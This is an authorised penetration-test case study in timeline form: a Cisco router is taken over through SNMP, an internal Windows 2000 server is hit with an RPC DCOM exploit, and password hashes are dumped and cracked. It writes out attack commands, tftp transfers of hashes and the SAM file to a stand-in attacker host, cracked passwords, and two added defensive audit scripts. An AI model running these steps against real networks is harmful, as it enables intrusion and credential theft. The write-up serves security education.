A White Hat's Penetration Test

This tutorial is more of a "case study", in which I describe a recent penetration test I performed. Because the test succeeded in a relatively short time, I decided to share the experience with you.

Please note that all identifying details such as IP addresses and hostnames have been changed, to protect the vulnerable and innocent.

I would like to thank my anonymous client for allowing me to write up and publish this article.

Chain of Events:

1:20 am
I sit down in front of my screen, with a fresh cup of coffee. My goal is to remotely penetrate company.com, at their request, of course. The only prior information I have is their domain name: company.com.

1:22 am
I decide to start with a bit of DNS enumeration, to identify company.com's gateway routers and hosts and get a general idea of what kind of network they have. I use 'nslookup' for this.

Gentoo Tools # nslookup
Note: nslookup is deprecated and may be removed from future releases.
Consider using the `dig' or `host' programs instead. Run nslookup with
the `-sil[ent]' option to prevent this message from appearing.
> set type=ns
> company.com
Server: dns.isp.net
Address: dns.isp.net#53

Non-authoritative answer:
company.com nameserver = dns.isp.net.
company.com nameserver = dns2.isp.net.

Authoritative answers can be found from:
dns.isp.net internet address = 193.117.205.95
dns2.isp.net internet address = 193.117.205.94
> set type=mx
> company.com
Server: dns.isp.net
Address: dns.isp.net#53

company.com mail exchanger = 10 mail.isp.net.
company.com mail exchanger = 0 mail.company.com.

Nslookup suggests that company.com's DNS records are managed by their ISP, which makes a successful DNS zone transfer unlikely.

I attempt to identify company.com's mail server, which turns out to be "mail.company.com" (the MX record with cost 0). This suggests that company.com hosts their own mail server, on site.

1:30 am
I run nmap on mail.company.com, and find a variety of services running on it.

Gentoo Tools # nmap -sS mail.company.com

Starting nmap 3.45 ( http://www.insecure.org/nmap/ ) at 2003-10-19 19:40 IST
Interesting ports on mail.company.com (234.212.54.3):
(The 1644 ports scanned but not shown below are in state: closed)
PORT    STATE SERVICE
23/tcp  open  telnet
25/tcp  open  smtp
79/tcp  open  finger
80/tcp  open  http
110/tcp open  pop-3
143/tcp open  imap

Nmap run completed -- 1 IP address (1 host up) scanned in 26.304 seconds
Gentoo Tools #

"Strange" I think to myself. "A Mail server running 'Finger' service?". I run a quick UDP scan.

Gentoo Tools # nmap -sU -p 161-162 mail.company.com

Starting nmap 3.45 ( http://www.insecure.org/nmap/ ) at 2003-10-19 19:48 IST
Interesting ports on mail.company.com (234.212.54.3):
PORT    STATE  SERVICE
161/udp open   snmp
162/udp closed snmptrap

Nmap run completed -- 1 IP address (1 host up) scanned in 2.119 seconds
Gentoo Tools #

"Hmm, SNMP is enabled...Could this be a router?".

A quick telnet command to mail.company.com verifies my suspicions.

I immediately recognize the Cisco Telnet banner.

Gentoo Tools # nc -v mail.company.com 23
mail.company.com [234.212.54.3] 23 (telnet) open

User Access Verification

Password:
Gentoo Tools #

Apparently, mail.company.com is a router that port-forwards (PAT) the POP3, HTTP and IMAP ports to one or more internal servers.

My next step is to identify the router, hoping it really is a Cisco. This can be done over SNMP, and Filip Waeytens' SNMPEnum does the job perfectly. The following is a shortened output of SNMPEnum:

Gentoo snmp # perl -w snmpenum.pl 234.212.54.3 public cisco.txt
----------------------------------------
        SYSTEM INFO
----------------------------------------
Cisco Internetwork Operating System Software
IOS (tm) Software, Version 12.0(5)T, RELEASE SOFTWARE
Copyright (c) 1986-1999 by cisco Systems, Inc.
Compiled Thu 23-Jul-99 13:14 by C
Gentoo snmp #

I run the SNMPEnum script assuming that the SNMP read-only community string is the default, "public" (SNMP is often misconfigured this way). Fortunately for me, this assumption is correct. The read-write community string, however, has been changed.

I whip out my favorite SNMP community string bruteforce tool (Solarwinds SNMP Dictionary attack), and start pounding at the router, with my favorite dictionary file.

After a (long) while, I see the good news I was hoping for: I finally have the read-write community string. This should allow me to download the router's configuration (SNMP permits this). A quick turn with the modified "snmpbrute", and I tftp the router's configuration file straight to my attacking machine.

1:55 am
Doing the "Wild Indian rain dance". I go to the kitchen for some more coffee.

1:58 am
I start looking at the Cisco configuration file. It seems that the login and enable passwords are the same. I use a Perl script to decode the Cisco "type 7" password obfuscation, which is reversible rather than real encryption. The password turns out to be "therouter".

Current configuration:
!
version 12.2
no service pad
!
hostname mail.company.com
!
enable password 7 0958460C0B0A02060E1E
!
login
transport input none
stopbits 1
line vty 0 4
 password 7 0958460C0B0A02060E1E
 login
!
end
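As an added example that is not part of the original article, the following check shows the type 7 decoding step as a configuration-audit tool: it scans a constructed config fragment built from the lines above, recovers every "password 7" value with the public fixed-key XOR scheme, and so demonstrates why such lines must be treated as plaintext and replaced with "enable secret" and a hashed login method. The sample config and the two functions are mine; the encoded value is the one quoted above.

```python
# Added example, not from the original article: audit a Cisco config for
# "type 7" passwords, a fixed-key XOR obfuscation anyone holding the
# config can reverse, so such lines must be treated as plaintext.
import re

# The fixed key IOS uses for type 7 obfuscation (publicly documented).
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"

# Constructed config fragment built from the lines quoted in the article.
SAMPLE_CONFIG = """\
!
hostname mail.company.com
!
enable password 7 0958460C0B0A02060E1E
!
line vty 0 4
 password 7 0958460C0B0A02060E1E
 login
!
end
"""


def decode_type7(encoded: str) -> str:
    """Reverse type 7: two decimal digits give an offset into TYPE7_KEY,
    then each hex pair is one password byte XORed with the key byte at
    (offset + position)."""
    if len(encoded) < 4 or len(encoded) % 2:
        raise ValueError("malformed type 7 string")
    offset = int(encoded[:2], 10)
    data = bytes.fromhex(encoded[2:])
    plain = bytes(b ^ TYPE7_KEY[(offset + i) % len(TYPE7_KEY)]
                  for i, b in enumerate(data))
    return plain.decode("ascii")


def find_type7_secrets(config: str) -> list:
    """Return (line_no, decoded_password) for each type 7 line in config."""
    pattern = re.compile(r"^\s*(?:enable )?password 7 ([0-9A-Fa-f]+)\s*$")
    return [(no, decode_type7(m.group(1)))
            for no, line in enumerate(config.splitlines(), 1)
            if (m := pattern.match(line))]


if __name__ == "__main__":
    for no, secret in find_type7_secrets(SAMPLE_CONFIG):
        print(f"line {no}: type 7 password recovers as {secret!r}; "
              "replace it with 'enable secret' and a hashed login method")
```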

A deeper look into the router's configuration file reveals the internal address of their mail / web server: 172.16.0.5.

The following part of the Cisco configuration file NATs the ports from the router to the internal mail / web server:

!
ip nat inside source static tcp 172.16.0.5 143 234.212.54.3 143 extendable
ip nat inside source static tcp 172.16.0.5 80 234.212.54.3 80 extendable
ip nat inside source static tcp 172.16.0.5 110 234.212.54.3 110 extendable
ip nat inside source static tcp 172.16.0.5 25 234.212.54.3 25 extendable
!

2:30 am
I sip my cold coffee and start profiling the information I have so far. In the background, I verify that their internal server is indeed running Windows 2000.

Gentoo# nc -n 234.212.54.3 80

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Wed, 29 Oct 2003 20:09:02 GMT
Content-Type: text/html
Content-Length: 87

Gentoo# nc -n 234.212.54.3 110
+OK Microsoft Exchange 2000 POP3 server version 6.0.6249.0 (main.company.com) ready.
Gentoo#

"Their internal server is most probably running Windows 2000. What are the chances that company.com feels secure - thinking that they are protected by their router? What are the chances they havn't patched their internal servers against some major vulnerabilities?" I decided to give it a shot.

2:38 am
My first choice is to attempt the RPC DCOM exploit against their internal server, but in order to do this I have to open a few more ports on the router and direct them to the internal mail / web server.

Router#conf t
Enter configuration commands, one per line.  End with CNTL/Z.
Router(config)#ip nat inside source static tcp 172.16.0.5 139 234.212.54.3 139 extendable
Router(config)#ip nat inside source static tcp 172.16.0.5 135 234.212.54.3 135 extendable
Router(config)#ip nat inside source static tcp 172.16.0.5 445 234.212.54.3 445 extendable
Router(config)#ip nat inside source static tcp 172.16.0.5 3389 234.212.54.3 3389 extendable
Router(config)#ip nat inside source static tcp 172.16.0.5 10000 234.212.54.3 10000 extendable

While I'm at it, I open up all NetBIOS ports (for later SMB enumeration) and terminal services (I'm feeling lucky). I also open port 10000, knowing I'll need an extra port in order to connect my shell to the internal server.
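As an added example that is not part of the original article, the following check shows how a defender could catch the NAT changes just described during a routine configuration review: it parses the static NAT lines of a constructed running-config excerpt (built from the lines above, with the article's placeholder addresses) and reports every forward that is missing from an assumed approved baseline of the four original ports.

```python
# Added example, not from the original article: flag static NAT forwards on
# a Cisco router that are not in the site's approved baseline (the 135, 139,
# 445, 3389 and 10000 forwards added above would be surfaced by this check).
import re

# Constructed baseline of (inside host, inside port) pairs meant to be exposed.
EXPECTED_FORWARDS = {("172.16.0.5", 25), ("172.16.0.5", 80),
                     ("172.16.0.5", 110), ("172.16.0.5", 143)}

# Constructed running-config excerpt mirroring the article's NAT lines.
RUNNING_CONFIG = """\
!
ip nat inside source static tcp 172.16.0.5 143 234.212.54.3 143 extendable
ip nat inside source static tcp 172.16.0.5 80 234.212.54.3 80 extendable
ip nat inside source static tcp 172.16.0.5 110 234.212.54.3 110 extendable
ip nat inside source static tcp 172.16.0.5 25 234.212.54.3 25 extendable
ip nat inside source static tcp 172.16.0.5 139 234.212.54.3 139 extendable
ip nat inside source static tcp 172.16.0.5 135 234.212.54.3 135 extendable
ip nat inside source static tcp 172.16.0.5 445 234.212.54.3 445 extendable
ip nat inside source static tcp 172.16.0.5 3389 234.212.54.3 3389 extendable
ip nat inside source static tcp 172.16.0.5 10000 234.212.54.3 10000 extendable
!
"""

NAT_LINE = re.compile(
    r"^ip nat inside source static (tcp|udp) "
    r"(\d+\.\d+\.\d+\.\d+) (\d+) (\d+\.\d+\.\d+\.\d+) (\d+)")


def parse_static_nat(config: str) -> list:
    """Return (proto, inside_ip, inside_port, outside_ip, outside_port)
    for every static port forward in a running config."""
    entries = []
    for line in config.splitlines():
        m = NAT_LINE.match(line.strip())
        if m:
            proto, iip, iport, oip, oport = m.groups()
            entries.append((proto, iip, int(iport), oip, int(oport)))
    return entries


def unexpected_forwards(config: str, expected: set) -> list:
    """Forwards present in the config but absent from the baseline."""
    return [e for e in parse_static_nat(config)
            if (e[1], e[2]) not in expected]


if __name__ == "__main__":
    for entry in unexpected_forwards(RUNNING_CONFIG, EXPECTED_FORWARDS):
        print("ALERT: port forward not in approved baseline:", entry)
```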

I whip out my exploit toolkit (framework) and send the RPC DCOM exploit to the router, knowing that it will be redirected to the internal server thanks to my recent NAT modifications on the router.

Gentoo # ./cli exp/msrpc_dcom1_overflow.exp payload=winbind rhost=mail.company.com lport=10000 OS=2K E
[*] Generating payload winbind (x86, win32, bind)...
[*] Payload generation complete (668 bytes)
[*] Using return address 0x77838eef with scratch pad at 0x7ffde0cc
[*] Connected to mail.company.com:10000...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

3:01 am
Time for more coffee. It seems that my assumption paid off: this company has NOT patched their internal servers, due to a false sense of security. I now have SYSTEM privileges on their web / mail server.
I quickly upload pwdump4.exe in order to dump the password hashes to a file for later, local cracking.

Once the hashes are dumped to a file, I tftp this file from their internal webserver back to my attacking machine.

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>tftp -i my.attacking.ip GET pwdump4.exe
C:\WINNT\system32>pwdump4.exe 127.0.0.1 >company.com.hashes.txt
C:\WINNT\system32>tftp -i my.attacking.ip PUT company.com.hashes.txt
C:\WINNT\system32>

Usually I'd use John the Ripper to crack these password hashes; however, I recently finished generating RainbowCrack's hash tables, and I thought I'd give it a try.

D:\TOOLS\password\RTGEN>rcrack.exe *.rt -f hash.txt
reading lm_alpha-numeric_0_2400x40000000_bla.rt ...
315498496 bytes read, disk access time: 17.49 s
verifying the file ...
searching for 29 hashes ...
plaintext of df168b2dd34bad07 is ***
plaintext of ac59766adf048863 is ***
...
statistics
------------------------------------------
plaintext found: 24 of 29 (82.76%)
total disk access time: 155.57 s
total cryptanalysis time: 428.81 s
total chain walk step: 151943227
total false alarm: 66931
total false alarm step: 56200430

username password
------------------------------------------
Administrator T3L3PITA
Dudu SINDY
Anat REUVEN101
....
D:\TOOLS\password\RTGEN>

RainbowCrack proved to be an invaluable tool, and shortened the whole NTLM hash cracking process to less than 10 minutes. Using John the Ripper, this could have taken anywhere from a week to a couple of months.

3:30 am
Once the administrator password is found, I attempt to connect to port 3389 on mail.company.com, hoping that, perchance, terminal services is enabled. It seems that lady luck is in my favor, and I receive a terminal services window. Using the cracked Administrator password, I log into the web server. Mission completed.

3:37 am
To completely consolidate my control of the client's network, I upload a modified version of KaHT II (the RPC DCOM autohacker) and edit its macros.txt file, so that each successful exploitation would tftp the 'repair' SAM file to my attacking machine.

At this stage, I stop my attack on the client's network, as the contract objectives are completed.

3:57 am
I take one last sip - What would I do without my coffee?


Mati Aharoni, MCSES, MCT, CCNA, CCSA, CISSP
Visit the Security through Hacking Web site at http://www.secureit.co.il for additional information.


